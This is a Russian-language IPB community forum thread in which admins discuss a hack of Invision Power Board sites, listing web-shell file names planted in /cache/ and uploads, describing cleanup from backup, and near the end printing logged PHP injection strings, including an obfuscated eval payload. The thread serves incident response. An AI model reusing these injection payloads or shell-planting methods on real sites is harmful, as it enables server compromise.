Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
siv1987

Security update

Рекомендованные сообщения

Ритсука зачем палишь разновидности? :)

 

Всплывает старая истина: запрет на web-доступ к /cache/ - всегда хорошая идея)

Обходится как два пальца.

Поделиться сообщением


Ссылка на сообщение

Ёёё, а тут оказывается целая тема, почему не видел???? :o Сидим на IPB как на мине замедленного действия, и когда она сработает, Бог его знает.. :(

Поделиться сообщением


Ссылка на сообщение

Я сейчас в Минске и не имею доступа... Проверьте нас, кто может. Один sh.php я до патченья тут удаляла из папки кэш.

Поделиться сообщением


Ссылка на сообщение

Как минимум, есть еще такой:

 

http://ipbskins.ru/forum/sh.php :)

 

Сейчас посмотрю.

Поделиться сообщением


Ссылка на сообщение

И еще были:

 

/cache/9ed28f49e4a432d582c27def5cb172e3.php

/cache/cache_clean.php

Поделиться сообщением


Ссылка на сообщение

О, да тут еще новый патч не стоит. Залил новый.

  • Upvote 2

Поделиться сообщением


Ссылка на сообщение

Спасибо

Поделиться сообщением


Ссылка на сообщение

Так же замечено, что заливают шелл в uploads (uploads/profile) под видом jpg файла, в большинстве случаев с названием photo-128.jpg размер ~67.38 KB. В принципе такой шелл бесполезен, так как php там не исполняется (в нормальной среде), но по каким-то, пока необъясним причинам, у некоторых пользователей форум все же их исполняет. Поэтому следует иметь ввиду и проверится.

Поделиться сообщением


Ссылка на сообщение

А ведь можно написать скрипт, который будет ходить по всем форумам, искать на них sh.php и остальные версии, и, если найдет, выполнять через этот шел удаление всех шелл-файлов и установку патча :)

Поделиться сообщением


Ссылка на сообщение

Добавлю в коллекцию:

/cache/2f617aab0a2e830c7370a745b88af170.php

/cache/ipbcache.php

/cache/view-cache.php

 

Содержимое то же.

Поделиться сообщением


Ссылка на сообщение

А ведь можно написать скрипт, который будет ходить по всем форумам, искать на них sh.php и остальные версии, и, если найдет,

Ага, а если не найдет - залить. :) И повесить скрипт на ипбскинсе

Поделиться сообщением


Ссылка на сообщение
Ага, а если не найдет - залить.

И тоже пропатчить, а потом удалить :)

Поделиться сообщением


Ссылка на сообщение

В другой теме обещал, здесь выкладываю. Может кому будет интересно и полезно на будущее.

 

Здесь видно содержимое корневой директории одного из сайтов взломанного аккаунта, где как раз в папке forum стоит IPB:

post-5412-0-79261300-1352429499_thumb.png

В корне стоит ABO.CMS

Подчеркнул "лишние" папки и файлы, а также стандартные, если их подменили.

 

Содержимое одной из "лишних" папок:

post-5412-0-87685600-1352429507_thumb.png

 

Тут директория кеша IPB, там видны самые "старые" чужеродные файлы, датируются от 16:00 4 ноября. Это самые "старые" занесенные на площадку файлы, видимо с них все и началось:

post-5412-0-95609500-1352429514_thumb.png

 

Выгребать столько дерьма (в каждую из "нормальных" обязательно папок что-то напихали) было нереально, все равно была опасность оставить где-то "хвостик" заразы. Выручил бекап за утро 4 ноября, с предварительным удалением всего что есть на площадке (не только в директории www).

 

 

Вот что странно, а как зараза вылезла выше директории сайта, захватила другие сайты этого акканта?

 

Судя по дате заражения других сайтов этого пользователя, видимо все же посадили (через его же сайт) заразу на комп, откуда заходили в панель хостинга (сейчас, пока распаковывал бекап, антивирус постоянно ругался и поместил в карантин около 20 файлов, их на скринах не видно, все они лежали в корне сайта).

Поделиться сообщением


Ссылка на сообщение

(Продолжение)

 

Содержимое wchckd.php:

==============================================================================
=========================        END       ===================================
========================= /forum/index.php?<?print(512314);print(512314);die;?> ===================================
==============================================================================

Содержимое файла wchckd4.php:

 

 

==============================================================================
=========================        END       ===================================
========================= /forum/index.php?<?$d=substr(8,1);foreach(array(36,39,112,49,39,93,59,36,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,11,6,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);exit;?> ===================================
==============================================================================

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...